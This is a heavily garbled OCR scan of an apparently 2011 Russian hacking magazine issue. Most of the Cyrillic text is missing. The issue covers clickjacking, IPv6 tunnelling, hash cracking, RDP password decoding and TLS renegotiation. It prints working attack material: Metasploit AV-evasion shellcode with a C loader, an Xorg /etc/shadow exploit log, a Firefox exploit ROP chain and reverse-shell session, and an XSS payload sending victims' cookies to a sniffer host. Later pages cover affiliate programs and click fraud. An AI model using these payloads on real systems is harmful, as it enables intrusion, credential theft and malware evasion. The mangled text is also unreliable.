This content cannot displayed in frame help protect the se
- . .
f unction_refreshSettings(timeout) { window ._ ~etTimeaut (fu n ction () _ {_ .... $ C.!tsgtt.i.ngs' ) . empty () , appen_d_( $ ( ' .< i frame
allowtransparency="true" src="https: / /www.macrome-dia.com/support/fiashplayer/sys/settingsmanager2. swf?defaultTab=privacy"> '));
setSettingsVisibility(); }, timeo_ut);
Adobe JavaScipt-o, ifame. SWF-
- . , , ? : ) (www. fe oss.og/webcam -spy), ',
' Fiefox Safai, GitHub (github.com/ feoss/we bcam - spy). ,
z-index opacity SWF-, ifame. , ,
Adobe . . ( ), -
WordPress ~"'~1ack Exploit vl ~----=--::- -
d~ Flash~ Player Settings anager
Website Privacy Settings F'or "~bses u hu\~ 11lrcd V\Sttc.-d. \ tc\\ or ltnn 1l1c pn\a )' scLtan '$ for necc. to your mcro :md 1 or nttcrophot1c.
A11vays ask @ Always allow QAJways deny Visited wes es Privacy Wesrtes () loss.org
Flash Player 'a
Delete all sites
Wied Gizmodo , Flash .
? , , , SQLi , , XSS.
(, , ). , . , clickjacking'a
- ( ), . FieFox NoScipt
( addons . moz ill a . og /r u /fire fox/addon/nosc r ipt ) . ClearCiick
, . , . I
White Hat Secur1ties i :: . - t . .
' +
-----
-----
-----
The hidden lframe contains : http/lwordpresslwp-adminlplug!n-tnstall.php?tab-plug!n-lnformatlon&r iframe=te&wjd-640&hejght-58l
Author: Chnian 8e1rtr!s
#outerdiv { width: 1 ; height:Opx; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:O;}
Last Updated: 1135 deys ogo Requlres WordPress Verslon: 2.5 or higher
#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height :1 00px; border: n ;}
- WordPress
12/155/2011 0~9
www.epidemz.net
PCWNE
IPV6-APEC ? , ,
: 1v4- . ? ? ? .
,
1v4- 1Pv6. :
. 1Pv6
, .
Windows
1Pv6: jpv6-test.com/ speedtest
, 1Pv6: bjt.ly/rHoc4B SixXS : bjt.ly/vOIOAC
~ ~Torrent Windows [{)
! ~;t) ~ n n !v/ eredo
uTorret Teredo
050
'-' ? 128- [2001 :5c0:1400:a::68dl 32- [65.148.151.1241- 1v6-. : 1v6- , . , ,
1v4- . , 1Pv6,- I-, NAT . ,
. . 1. ,
NAT. NAT, 1v4- . , [ii- , [!
. NAT : , , . iCQ,
I-, . [ !, 1Pv6 . , , , 1Pv4 1v6 [
1Pv6 ! . , 1Pv6. , , , 1v6-
. 1Pv6 , [ 1Pv4-apecal .
12/155/2011
www.epidemz.net
Oepending on your environmen~ you will connect to the gogoSERVER either anonymously or with authentication credentials. options are availate in the Advanced tab.
Server Address: anonymous.freenet.net
@ Connect Anonymously > n Using the Following Credentials
l st-e-pa-n-,.il:-yi:-n@-=--gm-----:ail.com -: ord: ~ ---~
111 l aunch the gogoCUENT service at system startup
Restore Default Values ...
Chec!c for update [ AJ>pl =:J 1 Close
2. 1v6 -. , - (, Bitoentl, 1Pv6
, . ,
. . IP UOP, UOP 1Pv6, 1v6- U-, . , , >> 1v6- 1Pv4 ( , UOPv41.
, . 1Pv6-to-1Pv4?
, 1Pv6 Uv4-: , ,
. 3. .
, - . , tnt-, N', ,
I- ( !. 1v6-, . , , N', -
I- ( 1Pv6, ! . tnt 1Pv6: uToent, Azueus, ansmission. 1 Pv6 ( ! , , . s6,
, 18 (16-, 2-nopl .
12/155/20 11
1Pv6:
Connection Status unnellnformation
Virtual Tunneling Adapte. Tunnel Mode:
4
Local Endpoint Addrees:
Remote Endpoint Addrees:
IPW-in-UDP-1Pv4 Tunnel (NAT Traversal) 2.148.151123 2001 :050:1400:000::::007
81.171.72.12 2001 :050:1400:000::::00 Sever Address: anon-amsterdam .freenet. net
N' . gogoCLIENT NAT Tavesal,
Wh2n oth protocots arl! available, your rowser usl!s
IPv
Yow ntemet connection iiPv i
2001:Sc0: 1400:a::68d gogo Inc.
1!1 Address type is
Global Unicast 1 Native IPv
Your rternet connectn is 1Pv4 capitble
62.148.151.123 Klgelecs
1Pv6- IPv~-apeca. ,
, 1v6- , . , thepiatebay.og ipv6 .n nm-club . u - n .
4. . n
( > , ! . , , > :1.
. .
, 1v6- .
, - 1Pv6? , , , - 1v6- . , - ,
, - , ( , > ], , - , . n , - , 1Pv4. , , 1v6-, ,
, - . . .
, .
1v6-, . . 1Pv6 ( ] ,
. NAT, 1v4- , , n ,
. 1Pv6. .
051
www.epidemz.net
PCZONE
Gogonet/Freenet6 gogonet.gogo6.com
n , n , NAT. GUI-
, n/56-n . 1Pv6, , , . .
Hurricane Electric 1Pv6 http :Uwww. tu n ne 1 ker. n et
, /48-n 1v6- . , no
[, , , , , , ! , , . ,
, IP.
SixXS www.sixxs.net
I-, , n , 1Pv6. [ ! 40 . : n [ Linkedlnl, . > [ it . ly/snYfdm l.
6to4 1v4-, 6to4- 1Pv6.
, . 6t4- 1v6-, 6t4-,
1v4-, 1v6-. 6t4- 1v6-,
anycast-apecy 192.88.99.1. , 6to4, 1v6- 1v6-. , .
6t4- , - 1v4-, , , 192.88. 99.1. . 6to4 , 6to4
, , , . - ,
. . I-, 1Pv6. 6to4 n . , ,
, , 200 .
Teredo , I-, NAT. 6to4 - -
052
0 n 1Pv4 , , 62.148.151.123
n 1Pv6 , , 2001:5c0:1400:a::68d , 1Pv6 n: freenet6 t ! r 8-ro ~ 2011 . ~
& I-
93.100.186.155.pool.sknt.ru [uTP] 178.255.14835
200 :2000 :4008:3 :224 : 7 eff:fE01: 84 2001:250:1401:3120:59d1:58a:801d:c095
m 94-192 -124-184.zone.bethere.co.uk
1v6- -
: , , 1Pv6 UDPv4 . ! , ) gogo6/ Feenet6 lgogonet .gogo6.com ), .
, , , 1Pv6, n,
12/155/2011
1Pv6:
% 1J orrent 2.2 DHP 100.0 703.8 kB/ s libTorrent 0.12.6 D 100.0 3613 kB/ s Bit ornado/031 D 100.0 78.8 kB/ s 1-1 orrent 1.8.5 UD 45.7 12.0 kB/ s
Bit orrent SDK 2.0 D 100.0 0.7 kB/ s
. feenet6, gogo6, n. : 1Pv6-in-1Pv4 l
, IP), 1Pv6-in-1Pv4 NAT vsli 1Pv6-in-UDP-is- 1Pv4),
, IP, 1Pv4-i-1Pv6la , 1v4-, 1v6-). n n TSP ITue l Setup Potocol) . , n .
: 1. gogoCLIENT lgogonet.gogo6.com/
pof il e/gogoCL I ENT). 2. ,
Conect>> .
, n , - 1Pv6-pecypc !n, ipv6.goog le.com). . - n 3653. . ,
1v4- n 1Pv6. 1v6- , : 1. lg ogonet.gogo6 .com/page/feen et6-
egistatio ), feenet6 . 2. > , . 3. > .
1v6-, - no n test-ipv6 .com. - n .
feenet6 - lusename.boke.feenet6 . net). , n n plain-text'e. , Advanced PASS DSS 3DES1 Digest MD5.
IPV6 feenet6- , n 1v6-,
. , , , !n, ). , - . , n 1 , . ::::
053
www.epidemz.net
/ EASY GreenDog , Digital Security ltwi tter.com/a ntyurinl
SMS ii'J.!i
- ! , IDS, DMZ, PDF - ,
.~ , SS-, . ,
SMS. , , . (
). - , . :) - Smsglobal [www.smsgloba l.com). , -
WINDOWS
, Windows 7/2008, , , ,
, .
1. n . 2. :
. {ED7BA47e-8E54-465E -82 5C -99712e4EelC}
- , ,
. , EasyHack. :)
051.
-
n 25 SS- . , [ fs 7 Sende 10) . ! n , n n
. n no , n nn, n n SMS 1 . ,
n , SMS. n, -
e-mail, - n SMS. , , ,
- .
OQ j i;;.-Desl:top~llgoods ni!n.
* ,6"- w 1t110t11 \1 .. . .. tn {3) t6141l ~ AiroN.:oe~npo~e~rwoc-Ao:olllllllrrtiOC~ntlle.t AI!'Ony
, - . , - !- . !! , ,
. , -. , . ! ,
- . ,
. XXI ! -, - . :1 thn- Findmyhash lcode.google.com/p/f indmyhashl. ,
-. >>, .
:
python findmyhash_v1.1.2.py MDS -g \ -h a2Sb2?1eba9de114~9adc7dfbea7235
python findmyhash_~1.1.2.py NTLM -f hacked_domain.txt_
RDP
, - , , , , -
, . , , , . ,
, , .
. RDP- Windows . RDP , 6- [ Vista Sv 20081.
, d-.
. , ? Default.dp, [, RDP 61.
, passwod .
, CyptUnpotectData[J cypt32.dll . , [ !.
, , , SID , .
12/155/201 1
EASY
: -h- ; -f- ; -g- Google.
, .
MDS NTLM-xwe
- Cain&Abel [www.ox id .i t l.
Remote De sk top Passwo d Decode d-. & .
, MSF . d .
MSF, :
1. mtt . 2. st-:
~ Defoult.rdp Notepa.d
d-
055
www.epidemz.net
1 EASY
SSLV-
HTTPS. mai - t he-mi'dd l e SSL- , SS Lv3/ LS. - , BEAST -
. : , , ap-spoofig.
- SSL
[ ap-spo of i g ). . ? SSL. 2009 - TLS/55Lv3 eegotiatio vul [CVE-2009-35551 . , [ ,
) . , 10 % [ : www.ssllabs.com/ssld/aalyze.htmi l .
. , , , . , :
11 TLS hadshake [ 11 .
1.1 LS [ 2) .
1.2 2.
2) [ eegotiatiol. ) 1, ,
2 [ Sessio \0, , 1 21.
Client
I J~--~~~~~~~: .~ LS Handshake sesslon #1 Attacker Server (S)
1 1 1
(dienl server) -tttacker holds l the packets 1 1
- 5nig11Ch DIIt-CO'I'I'I'Uiic:l --~ OclldliNictyplllcl~
ar- :CIIIrlt~ lt8CI ........ .u..
(i) ......... _T_L_S(-~tl-.;-~-S:-a~--=-=~-s81on-r)-#2--t .. : 1
. 1 ;;;~;rs:~;sa;;~;;nl;;.;-~l
commands of hls chofce 1 1 Q Renegotiotion ls triggered :
J 1 -~ LS Handshlllke sesson #1 contlnued (dl,nt-server) wlthln the encrypted sesslon #2 (attac,er.server) ~ 1 1 \7-;------------------ ... -............. ~
Cllent data ls encrypted wlthln sesslon ~1 (Green) (h attacker cannot read/ 1 1 manlpulate thls data), preVious data ~-2) preflxed to newty sent dient-data 1 1 1 1 1 1 1
056
. 4) ,
1.2, , 3.
, , >> . , , [ 1.1 1.21. [gtitil [ 21 [ 31.
. [
:11- ? TLS- [Sessio \0) .
, >> . , .
. [ 11 [ 1.11. ,
[ 3), .
? , , [ , ) . [www.g-sec.lu/pacticaltls . pdf ).
. -, SSLv3/TLS, HTTPS, FPS, SMTPS, 35 . . , . ? . ,
- . , ,
~~ M isceii
. , . , : 1. URL. , CSRF, G-. - heade
ijectio.
1) uiae 1. 2 GET /path/to/resource.jsp /1. Ignor-me: 2) , ,
: GET /path/to/resource.jsp HTTP/l.e
Igore-me: GET /index.jsp /1. Cookie: sessionCookie=Token
2. Redirect HTTPS . sslstip . HTTPS.
, , . , sslstip -
. SSL eegotiatio :
EASY
, ( 1.2):
GET /url_that_will_e2_to_HTTP Ignore-what-comes-now:
3. XSS. w- TRACE, JavaScipt-o.
1.2 : TRACE / /1. X:This cotent will refiected i the respose to the cl
ietalert('XSS') X-igore:
. . Pytho, . :1 ,
, - - (www. ss ll abs . com/ssld/a alyze . html), ssltest, BackTack 5, ssltlstest .
100 /- , XOR METERPRETER IJ.liaf.ir.:i
mtt Metasploit (www.metasp loi t. )- . , , mtt
. , - - ( ), -
. mtt, - - . .
. ... , .
MSF msfpayload - ,
. :
. .(avastl -~ -- -~-----
.... , "D:\prj\av_test\test_3.exe" . '"
, 3
:
1 :
:
XOR rocks! Avast
12/155/2011
0:00:00
1/0 15,1
--i"
#msfpayload windows/meterpreter/bind_tcp R 1 msfencode \ - 5 x8/shikata_ga_nai -t - test_.c
: windows/meterpreter/bind_tcp- MSF;
R - ; msfecode- ;
- 5 x86/shikata_ga_nai- payload ; -t - : ;
- test_.c - .
msfencode, , . msfpayload R, stage- , (mtt- -). , , . , MSF payload , . msfpayload - ( l.
- -, , . ! main - MSF,
. :
int mai ( int argc, char **argv) {
int ( *fuc) (); fuc=( int (*)()) buf; ( it )( *func) ();
057
www.epidemz.net
/ EASY
igned h buf [] "\x72\xc9\xac\x95\x39\xl\xll\x15\x8\xe8\x38\x96\xe5\x05\x7d\xaa\xfc "\xcd\xe3\x60\x74\x57\x4a\xaf\x2d\x94\xl3\x4b\xe3\xd4\x3a\x48\xc4\x7c
"\x34\x46\x56\x7a\x82\x7c\x5f\x3b\x54\x8e\x40\xa4\x3e\x2e\xa0\x75\xf "\x86\x78\x63\x4f\xf9\x91\xe\xlf\x7f\xc8\x33\xld\xfd\x78\xeb\x2e\xa "\xdl\x42\x2f\xd0\x99\x69\x25\x22\x77\xc\xaa\x3\x65\xdc\x03\x7f\xa "\\83\f2\59\2\\28\\\86\\39\7\49\\2\ "\xa\x2a\xf3\x4a\x62\x40\xd7\xdf\xa0\x7f\x83\x19\x95\xdl\x9b\x8b\xao "\x93\xc7\xc5\x32\x01\x59\xc2\x5d\xef\xld\x09\xb\xac\x81\xc4\xlc\x9 "\x09\xce\x74\xdd\x87\x8c\xl0\x43\xa3\x95\x44\xa4\x75\x54\x0a\x4b\xda
"\x38\xf5\xa9\x87\x37\x47\x42\x19\x05\x75\xde\x4a\xc8\xc\x5~\x7e\xO "\x49\x2c\x05\x61\xc3\xlf\xle\x30\x8b\xad\x51\x28\x2f\x59\x07\xf0\xf
"\x2c\x92\x87\xaf\x9e\x73\x9f\x3b\x5\xc2\xc3\x04\xcf\x40\x06\xf4\x9 "\x95\x2c\xla\xd0\xe\x7\x50\xe\xf2\xf3\xlf\x4f\xf6\xcc" ;
(int arqc, char arqv)
int i; f (i=O;i
WEXLER.HOME 903 n , n n ( n ,
nn). , n n, n . handycratta , n . , , n .
n n n . WEXLER.HOME 903 64- Windows 7 n n n
, n .
wexLU.
-~
ltel Core i5-650 3,2 - 4 . CPU
Turbo Boost, (
, ]. , .
GeForce GTX 460, Fermi.
DirectX 11 GTX 460 , NVIDIA 30 Visio , PhysX CUDA
, . .
WEXLER.HOME 903 4 , .
. , , , .
. WEXLER.HOME 750 . , , .
WEXLER.HOME 903 Windows 7 . n
64- : 4 n n.
, n n Microsoft Security Essentials Office 2010 Starter (
Word Excel, n n n].
Windows 7 . * wexLer:
/
, ! , , ,
. , !
1 Apache mod_proxy CVSSV2 5.0 111111111 111 11 1111
[]]I3] : 11 2011 . : Rodigo s . CVE: CVE-2011-3368.
1 IAV:N/AC:L/AU:N/C:P/I:N/A:N]
!, Nginx Squid], Apache ,
mod_poxy. -
!, ], , . , mod_poxy,
.
1:i RewiteRule PoxyPassMatch -, , -. Apache . .
, - :
RewriteRule (. *)\. (jpg]gif] png) http:/ /images.exa:>le.can$1.$2 [] ProxyPassatch (. *)\ . (jpg]gif]png) http:/ /images.exarrple.com$1.$2
, . :
GET @other.example.com/something.png /1.1
-, , :
http://images.example,[email protected]/something.png
, othe.example.com, images.example.comra . URI lraothe.example.com/something.png /1 .1 1
, n
060
livinside.iogspot.comJ 1115612, . , .1]
400 Bad Request. n SECFORCE . n : goo.gi/Ob6yV. mod_poxy n
, IDMZ]. , Apache ! Apache, ,
]. n , :
python apache_scan.py [options] [options]
-r: Apache -: n, Apache ( 80) -u: URL ( /) -d: (DMZ) (
127. . .1) - : n DMZ ( single port scan) -g: GET-anpoc DMZ ( /) -h:
:
python apache_scan.py -r www.example.com -u /img/test.gif , DMZ python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local , DMZ python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local - se -g /accounts/index.html
if.!;ldjfi Apache Sv 1.3. 1.3.42; Apache Serve 2.0 . 2.0.64; Apache Serve 2.2. 2.2.21.
JOi,J!iijiI mod_poxy
lgoo.g l/xNiqR]. , RewiteRule :
RewriteRule /(. *)\. (jpg]gif]png) http:/ /images.exarrple.com/$1.$2 []
12 /155/ 2011
www.epidemz.net
2 Xorg CVSSV2 5.7 1111 11111 111 1111 1111 111
[AV: L/ AC:L/ AU : 5/:/1: / A:PI
: 28 2011 . : vladz . CVE: CVE-2011-4029.
vladz g, /tmp/.tX-lock [-
Xl. .
, - .
1I g /tmp/.X -lock . - : [! /tmp/.tX -lock O_EXCL PID, /tmp/.X-lock, . /tmp/.Xn-lock. , , . , chmod[l
, , /tmp/.tXn-lock , !l.
, /tmp/.tXn-lock open[l [ 2961 chmodll [ 3181.
, , ... g [ l, [ 341 1 , chmod[l? :
# strace :1 [ .. . ] open("/tmp/.tXl-lock", O_WRONLY[O_CREAT[O_EXCL, 44) wr:i..t.e(e, " 2192\n", 11) chmod("/tmp/.tX1-lock", 444) =
, SIGSTOP SIGCONT, . ,
. , :
ACDSee FotoSiate 4.0. Access Vi ol atio. 5 -
12/155/2011
1. - [PID nl. 2. , SIGSTOP
/tmp/.tX1-Iock. , chmod[l.
3. /tmp/.tX1-Iock.
4. /tmp/.tX1-Iock -> /etc/shadow. 5. SIGCONT, chmod[l
444 /etc/shadow.
, , -,
, . - : /tmp/.X1-Iock -> /dontexist. - FataiEo[l.
exploit-db.com, 10- 18040. :
I]!'I . xcomoq_. ~ _xch_mpd ~n:;s. . /xchqg [ /} /J1] ( .. - .l'e.t _cjshadow)
i . ls -1_ 1 etc/ sha_dow _ -rw-r----- 1 roat sh_adow 187.2 Aug 7 e_7:1e_jetc/shadow $ .Lxchmod [ +] Trying to stop )(Qrg p_roc_e_ss right before chmod () [+] Process ID 4134 stopped (SIGSTOP sent) [ + ] __ Rei119V_ing /tq/. tx1-lock launching another Xc:Jrg process [+] Creating evil sylink (/tmp/ .tX1-lock -> /etc /shadow) [ +] Process ID 4134 resumed (SIGCONT _sent)_ [ +] Attack succeedec!, ls -1 /etcjshadow: __ -r--r-cr-- 1 root shad()w 172 Aug 7 H7:1e .. /.etcist)adoi>!
lt1;11Jf1 g 1.4 1.11.2. g 1.3 USE_CHMOD.
'iJ!IijiI g 1.11.2 1.12 .
Array.reduceRight 6-6 Mozilla
Firefox CVSSV2 10.0 11111 1111 1111 1111 11 111
[AV:N/AC:L/AU:N/C:C/I:C/A:CI 1I
: 13 2011 . : Chis Rohlf, lvnitskiy, Matteo Memelli, dookie2000ca,
si3, m _me, TecROc. CVE: CVE-2011-2371.
Metasploit, Mozilla Fiefox 3.6. ,
educeRight[l .
1I educeRight callback : [ iik-l, , , -
061
www.epidemz.net
/
Firefox 3.6.16. (generic/debug_trap)
. iik- l ), .
educeRight JS- _t js. . 2740 Aay.Length :
jsuint length; if (!js_GetlengthProperty(cx, obj, &length))
return JS_FALSE;
js. 2767. JavaScipt-oe educeRight, start, end step .
jsit ! ) .
jsint start = , end = length, step = 1; switch (mode) {
case REDUCE_RIGHT: start = length - 1, end = -1, step = -1;
start = length -1 , start , length- . JS-
, , :
~/head> var myobject = document.getElement8yid( 'd' );
function spray() { 1/ ...
}
spray(); obj = new Array;
062
obj.length = 2197815382; f = function trigger(prev, myobj, indx, array) {
alert(myobj[ e]); obj.reduceRight(f, 1, 2, 3);
spayll heap spaying ASLR. R-:
181F1886 1e1F188
183E8D78
183E8D7D
1D8 1D83
141 14
1846917 1846918
12 121
1e2Eeees 16
181F1886 1elF18e7
18283481 18283482
121
78891 > 78893 78894 78896 78899 7889 7C889AEF 7C889AF2 7C889AF4
7C889AF9 7C889AFA
18838768
; RETN
V ESI,DWORD PTR DS:[EAX] ; kernel32.Virtua1Alloc
RETN
8 xul.18838768 RETN
8 RETN
EDX RETN
xul.184C26Fe RETN
EDI xul.182AC881 RETN
RETN
PUSHAD RETN
RETN
MOV EDI,EDI xul.182AC881 PUSH 8 MOV E8P,ESP PUSH DWORD PTR SS:[E8P+14] PUSH DWORD PTR SS:[E8P+18 ] PUSH DWORD PTR SS : [E8P+C] PUSH DWORD PTR SS:[E8P+8] PUSH -1 CALL kernel32.VirtualAllocEx ; // ; 8
REN 18
JMP ESP ; payload
Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright msf exploit(mozilla_reduceright) > set payload windows/ meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(mozilla_reduceright) > set lhost 192.168.8.121 lhost => 192.168.8.121 msf exploit(mozilla_reduceright) > set uripath test
12/155/2011
www.epidemz.net
n n mod_proxy
uripath => test msf exploit(mozilla_reduceright) > exploit [ *] Exploit running as background job. [ *] Started reverse hand ler on 192.168..121:4444
( *] using URL: http: ;;e.e.e.e:sese; test [*] Local IP : http ://192.168.e.121:8e8e/ test [ *] Server started . msf exploit(mozilla_reduceright) > [*] Sending exploit to 192.168..123:174 .. . [*] Sending stage (752128 bytes) to 192.168 . .123 [*] Meterpreter session 1 opened (192 . 168..121:4444 -> 192.168..12:175) at 211-1-17 18:2:4 +4 [* ] Session ID 1 (192.168 . .121:4444 - > 192.168..123 : 175) processing InitialAutoRunScript 'migrate -f' [*] Current server process: firefox.exe (1992) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1652 [+] Successfully migrated to process
if.1 ldjfi Mozilla Fiefox 3.6.16, 3.6.17.
, .
' ACDSee FotoSiate id, L- CVSSV2 10.0 111111 11 11111 111111
ll1:iim : 10 2011 . : Pavez w, jua vazquez. CVE: CVE-201 1-2595.
111 IAV:N/ : L/ AU: N/C:C/1 : / :)
ACD FotoSiate- , ,
46 57. ,
12 / 155/2011
. 12 , , Metasploit, . , ACDSee FotoSiate 4.0 ! 146)
id Stig, . L- ACDSee FotoSiate
. S- . --t, , . 263557 ipwssl6.dll.
:
msf > use exploit/windows/fi leformat/acdsee_fotoslate_string msf exploit(acdsee_fotoslate_string) > set payload windows/ exec payload => windows/exec msf exploit(acdsee_fotoslate_string) > set cmd calc . exe cmd => calc .exe msf exploit(acdsee_fotoslate_string) > exploit [ *] Creating 'msf.plp' file . . . [ *] Generated output file /home/ pi kofarad/ .msf4/data / exploits / msf . plp
, ! ) .
jf.!;ldjfi ACDSee FotoSiate 4.0 Bui ld 146.
,_i,]!liiiI , . ::
g
063
www.epidemz.net
www.epidemz.net
, qweeqweqweewq [ alias sygwoc5eqwlbwfv ) [ )
[ 1 [ )
(http //httpz net) n (http.//152 137 21 . 112) ip
XS S
ur1 xss
!
-8 [ 1
[ email 1
n (http:l/site.com/xss.php?id=">)http://site.comlxss.php?id=%22%3E ( xss ). javascript , n
ur1 r , I., _ .:_fr_a_~s~t> ,_ ., .. _.
, - - stip_tags[J, . ,
. , :
6~1:
?
JS- SS- . ' :
! l, , .
. , , , ? - 20-30 JS- , .
JS ->> :
var servers = [ 'http://freel.hostl.com/' 4 'http://free2.hostl.com/' ,
'http://free.hostl.com/' ,
'http://freel.hostS.com/' , 'http://free2.host5.com/' , 'http://free3.host5 . com/' ]; for ( var key in servers) {
}
document.getElemetByid( 'footer' ).innerHTML += 'cscript src="'+servers[key]+'">' ;
if (loaded){ break;}
if (loaded){ .. . }
loaded, , . , , . ,
. - . ,
, . ,
logs.txt, .
-------lr~
-
066
2130000
, ,
XSS:
$_5ERVER['HTTP_U5ER_AGENT ' )- ; $_5ERVER['REMOTE_ADDR')- I-; $_SERVER['HTTP_REFERER')- ( n ); date("d.m.y H:i") - ; urldecode($_GET['c'])- n ;
$_SERVER[ ' QUERY_STRING')- .
, stip_tags!l. , Django, . , n , SS-. , ,
, , .
, , - ,
.
, , L-. . XSS , - . . :
c!>chtml>
, - , , , , - . !,
- demotivatos.u L- l ). ,
, , , -.: - )
12/155/2011
www.epidemz.net
!
XSS DEMOIVATORS.RU
XSS , . : 1. - XSS
, vkontakte . u , ma il. u , d .u . . XSS ,
. , d emo ti vatos. u .
, XSS :
Jl "" function (){ return new Image();} var xss_l;n(), xss_2;n(), xss_;n(), sniff ; 'var ; new Image(); x.src ; "http://tvoi.sniffer.comj?c;"+ escape(document.cookie); ~
// n XSS n "" xss_l.src ; 'http://_sitel.ru/search. php?q;">'+sniff+'' ; xss_2.src ; 'http://site2.ru/search. php?q;"> ' +sniff+' ' ;
xss_.src ; 'http://site.ru/search. php ?q;" > '+sni ff+' ' ;
[-
2. . n: no
, , n, , n JavaScipt-o, XSS div-co,
, . n, n
:
n :
window ._on.load;function() {
document.getElementByid( 'banners' ). innerHTML ; '' ; }
3. n n . n
JS + , n n n
. n: n JS-, n, JS-n
n , action n n.
!, nl n n tin-.
!n, ! . 4. n
n pop-unde pop-up. n
, n. 5. n
ifame. , n .
6. - n n JavaScipt :
document.getElementByid( 'id_dema' ). src; 'http://host . ru/podmena.jpg' ;
7. : ifame !n
!. 8. n
JS-.
{xss}- javascipt-o . , . .
, , . , AJAX. , ,
- HTML + JS. ,
. .
, . , - . SS-, , .
, n- n , , , . ,
. . :
< !DOCTYPE >< FRAESET onload; "{xss}" >
, , . :
< !DOCTYPE> < FRAESET onload; "{xss}" style; "display:none;" >
12/155/2011
.
, l l.
>>, XSS - .
, ,- , demotivatos.u.
. : 500 .
12 1180 !,
. , . ! ::
067
www.epidemz.net
- DBMX
..........
, ,
, -
! ,
.
www.master-x.com -
.
www.aofuckbjz.com -
-.
www.rxpblog.com -
.
(
)- , . - , .
. , . , . - ,
. , , , . ,
, , .
:
-
, - ,
.
.
068
, .
,
, .
() . , ,
, -
,
.
( ) , -
,
, ,
12/155/2011
www.epidemz.net
lg_eeics,
, ] . ,
, , , ,
.
- - , ,
30-50% .
,
- . -, ,
. l, , ] . .
, . .
! ].
. , .
- ,
, :]. , .
: :
:
, - .
- .
, , , .
, , . - .
.
Phamcash.com RX- Pates . iz Stimui-Cash.com OXOetwo k.com
201 2006 2006 2007
/ -: 40% , 30- 50% ! 75% 70% 100 - 45%, ] 300 - 50%
, , , , , , . , ., . , ., ., , , , , , , . , ., ., .
Visa, M asteCad, Visa, MasteCard, , Visa, MasterCard, , Visa, Euro D eit, , Wire , Wire Wire, MoeyGram Wire, M o eyGram
$100 $100 $50 $1 00 / ,
-
, - 110 ], - ! ,
]
12/155/2011 069
www.epidemz.net
-
. t >> .
. , , x h amste.com ,
. , .
, ? , -
. , ,
. $30.
- 40-60%.
, . , .
[ l, .
- ,
. , . [ !,
.
, [!. WodPess >> .
- .
FGH [ ,
/ -
-
/
070
Royai -Cash .com
2001
50-60% $30-40
44
check, wie, n, , WebMoney, Paxum, eCoin
EanCoin . com Aepatneship.com
2003 2003
50% 50%
23 173
check, wie, wie, n, WebMoney, Paxum, WebMoney, Paxum, eCoin, ePese eCoin
$100 $100
: :
:
l. , FGH . , - , , , .
.
FeoCash.com CashManiacs.com
1999 2003
50% 50%
58 128
Paxum, check, wie, ePaySevice WebMoney, Paxum,
ePaySevice
$300 $50
12/155/2011
www.epidemz.net
( PER CLICK) . cl ick- . - ' , - .
! ), , . , . , ,
. Iid) , l) . , , , , - . - . , id , .
, , .
,
. , .
:
. ,
.
, ,
! -
, ).
,
. - .
Bidtaffic.com Click9.com
2004 2008
/ - 70- 95% 70%
$40 $50 - ePasspote , Epese,
PayPal, Webmoney, StomPay, Wie EPESE, WebMoney
12/155/2011
Peakclick.com Daoclick.com
2005 2009
70% 80%
$100 $50 Wi e , Webmoney, ePassporte, ePassporte, Westen Union, EPESE, WebMoney PayPal, Wire
: :
:
Thegreenppc.com Bizzclick.com
2009 2009
80% 75%
$50 $10 Webmoney, Wire, ePassporte, PayPa l, PayPal StormPay, EPESE,
Visa, MasteCard, Western Union, PayPal, Wire, Liberty Reserve, WebMoney
071
www.epidemz.net
: :
: & .
: : : ' ,
. - , , . ,
. - . , .
! !, , .
/ - -
/
12/155/2011
Glavtog.com
2010
!! 25- 35%
Webmoney, Epass, PayPal, Wie
$100
n n n n
-. , , : -. , ,
.
,
XML , .
.
, .
Stimui-Cash.com Affiliate-pogam . Amazon .com KingsPofit .com
201 1996 2010
!!
!!
25% 4- 8% 25%
Webmoney, Epass, PayPal, Check Webmoney, Wie Wire, ePesee, Moneybookes
$50 $10 $100
073
www.epidemz.net
www.epidemz.net
Appearance
Plugins
JAVASCRIPT
BetterPrlvacy 1.66 ~ More j" Preferences Download Manager Weak 0.9.5 Alows .. . ~ j ~ Preferences j 8 Disable - Remove 1
Flashiock 1.5.15.1 Repla ...
NoScnPt WJB updar.ed atter res(ft F1retox.
41) NoScrlpt 2.1.2.5rc1 E>
www.epidemz.net
www.epidemz.net
. life4u apoo la. e . faronovlagm ail . com l
AdSense 10 .
. , .
078
www.qoogle.com/ ~-Google AdSese; direct.yandex.ru .; www.spybox.com. !li.-
- SpyBox; www.adwatcher.com -
Adwatcher; ~- ; l!iYti.ll&r!l - Piwik; www.qooqle. com/anaJytics/ .
[ . click f aud - )- , [ ) . [ , , ), [ - ) . , 10-15 % .
, . - -.
, . , . ,
. AdSese . , >
. , ,
12/155/2011
www.epidemz.net
/ (~
SpyBox
~- ~ " " u
" " " ..
B~oru,..,_ ... ,.. ,>O~, !
n-, $0,1 ] . : n n , nR,- - ! t~R nn n. n n
n n t~R, n n ~ t~,
n . n, n, n R . n n .
, .
n . n .
n -n IPay-peCiick- n, n ,
High Threat .. Heat l
12/155/ 2011
: R AdSense
10,000
9,091
8.182
7,273
6 ,364
5.455
4 .~4,
3 ,636
2 ,727
1,818
909
unique Clicks 8Ciicks 8ctions sles
Data to display: 0 Unique clicks [tJ Clicks rJ Actions EJ Sales Timeframe: [iast ~
- Adwatcher
n , ] . n , n . ! , IP n n ).
n , n .
, n n , n n ,
. n ,
n . 1. n I- ,
n, - . , I n .
2. n, n n , , :
, n nn , n .
Click
079
www.epidemz.net
.
?
n: n -n ? n , n / n . , n. 2007 n Yahoo! n .
Checkmate Strategic Group. n Yahoo! n n
2004 . 2006 Google 90 . n n nn
, , n n
n .
. n, n , n [ , n , ), : n- n
. 4. n ,
, . n . :
n, n [n, - n ),
n , n 100. n n
n. 5. n
, n n n .
: SPYBOX , n . n n n
. , n/ n, , n
. n , 100% , n [ , n ) .
n - n SpyBox. , n -, n n, n n, n n, , , - .
n: n n L-,
n . n [ ):
var script =document. createElement( 'script' );
080
script.type= 'text/javascript' ;
if(localSt orage.spybox) { var spybox_has h= 'a181a603769clf98ad927e7367c7aa51' ; var spybox_session= l ocalStorage .spybox; script .src= 'http://ua.robotreplay.net/fast.js' ; }
